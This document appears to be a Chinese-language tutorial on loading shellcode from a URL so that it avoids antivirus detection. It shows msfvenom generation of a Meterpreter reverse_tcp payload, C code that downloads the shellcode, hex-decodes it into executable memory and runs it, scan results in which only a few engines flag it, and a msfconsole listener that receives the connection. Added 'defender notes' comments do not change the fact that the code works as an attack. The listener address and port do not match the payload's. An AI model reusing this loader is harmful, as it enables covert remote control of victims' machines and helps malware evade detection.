• 通过URL载入ShellCode代码


    将生成的shellcode放到web服务器上,本地不保存恶意代码,本地只负责加载到内存运行,这样可以很好的躲过查杀。

    1. 生成shellcode
    msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
    -b '\x00\x0b' lhost=192.168.1.20 lport=9999 -f c
    

    2. 使用以下代码获取 shellcode,前提是已搭建好 HTTP 服务器,并将 shellcode 写入服务器页面中。

    #include <stdio.h>
    #include <Windows.h>
    #include <WinInet.h>
    #pragma comment(lib, "WinInet.lib")
    
    /* Fetches one plain-HTTP GET response body from host `URL` + path `SubPath`
     * over WinInet and returns it as a heap buffer (caller owns it; nothing here
     * frees it).
     * Defender notes, limited to what this listing shows:
     *  - the three WinInet handles (hInternet, hConnect, hRequest) are never
     *    passed to InternetCloseHandle, so they persist for the process lifetime;
     *  - only hConnect is checked; the results of InternetOpen, HttpOpenRequest,
     *    HttpSendRequest, HttpQueryInfo and InternetReadFile are ignored, so a
     *    failed fetch still returns a zero-filled 128 KiB buffer;
     *  - the fixed User-Agent "WinInetGet/0.1", port 80 (INTERNET_DEFAULT_HTTP_PORT)
     *    and the literal host/path are observable on the wire and in proxy logs;
     *  - InternetReadFile is called once, and dwRet (bytes actually read) is
     *    discarded, so the body is whatever fits in the single read. */
    char * GetUrlPage(char *URL, char *SubPath)
    {
    	HINTERNET hInternet, hConnect, hRequest = NULL;
    	DWORD dwOpenRequestFlags, dwRet = 0;
    	unsigned char *pResponseHeaderIInfo = NULL;
    	DWORD dwResponseHeaderIInfoSize = 2048;
    	BYTE *pBuf = NULL;
    	DWORD dwBufSize = 64 * 2048;
    
    	hInternet = ::InternetOpen("WinInetGet/0.1", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    	hConnect = ::InternetConnect(hInternet, URL, INTERNET_DEFAULT_HTTP_PORT, 0, 0, INTERNET_SERVICE_HTTP, 0, 0);
    	if (NULL == hConnect)
    		return NULL;
    
    	/* NO_AUTH / NO_COOKIES / NO_UI / RELOAD: no credentials, no cookie jar,
    	 * no dialogs, and the cache is bypassed on every call. */
    	dwOpenRequestFlags = INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP | INTERNET_FLAG_KEEP_CONNECTION |
    		INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD;
    
    	hRequest = HttpOpenRequest(hConnect, "GET", SubPath, NULL, NULL, NULL, dwOpenRequestFlags, 0);
    	HttpSendRequest(hRequest, NULL, 0, NULL, 0);
    
    	/* Raw response headers are read into a 2 KiB buffer that is then
    	 * neither used nor deleted. */
    	pResponseHeaderIInfo = new unsigned char[dwResponseHeaderIInfoSize];
    	RtlZeroMemory(pResponseHeaderIInfo, dwResponseHeaderIInfoSize);
    	HttpQueryInfo(hRequest, HTTP_QUERY_RAW_HEADERS_CRLF, pResponseHeaderIInfo, &dwResponseHeaderIInfoSize, NULL);
    	pBuf = new BYTE[dwBufSize];
    
    	/* Zero-fill so the caller's printf("%s") finds a terminator as long as the
    	 * body is shorter than dwBufSize. */
    	RtlZeroMemory(pBuf, dwBufSize);
    	InternetReadFile(hRequest, pBuf, dwBufSize, &dwRet);
    	return (char *)pBuf;
    }
    
    /* Entry point: fetches the page at the literal host/path, prints it and
     * waits for a key press. Defender notes: "192.168.1.20" and "/shellcode"
     * are plain string constants in the binary; the buffer returned by
     * GetUrlPage is printed with "%s" (it relies on the callee's zero-fill for
     * termination) and is never freed; argc/argv are unused. */
    int main(int argc, char * argv[])
    {
    	char *shellcode = GetUrlPage("192.168.1.20", "/shellcode");
    	printf("%s \n", shellcode);
    
    	system("pause");
    	return 0;
    }
    

    3.处理shellcode代码,并将其加载到堆,并设置可读可执行,执行代码反弹即可。

    	/* Fragment: these statements are not inside a function in this listing,
    	 * and `ShellCode` is not declared here (presumably a char* to the hex
    	 * text fetched above — confirm against the caller).
    	 * What the visible code does: decodes two hex characters per byte into a
    	 * calloc'd buffer, copies that buffer into a region allocated with
    	 * PAGE_EXECUTE_READWRITE and calls into it through a function pointer.
    	 * Defender notes: an RWX VirtualAlloc followed by a memcpy and a direct
    	 * call into the region is a common memory-scanner / telemetry detection
    	 * signal; neither calloc nor VirtualAlloc is checked for NULL, and neither
    	 * `value` nor `exec` is ever released. */
    	int shellcode_length = strlen(ShellCode);
    
    	unsigned char* value = (unsigned char*)calloc(shellcode_length / 2, sizeof(unsigned char));
    	for (size_t count = 0; count < shellcode_length / 2; count++){
    		sscanf(ShellCode, "%2hhx", &value[count]);
    		ShellCode += 2;
    	}
    
    	void *exec = VirtualAlloc(0, shellcode_length / 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    	memcpy(exec, value, shellcode_length /2 );
    	((void(*)())exec)();
    

    测试,查毒率 https://www.virscan.org/ 49个引擎,只有三个报毒。

    第二个 https://www.virustotal.com/ ,查毒率

    3.最后,生成成功后,我们将攻击主机运行一个监听事件,然后打开生成后的后门,然后发现能够成功上线。

    [root@localhost ~]# msfconsole 
    msf5 > 
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost 192.168.1.30
    msf5 exploit(multi/handler) > set lport 8888
    msf5 exploit(multi/handler) > exploit -j -z
    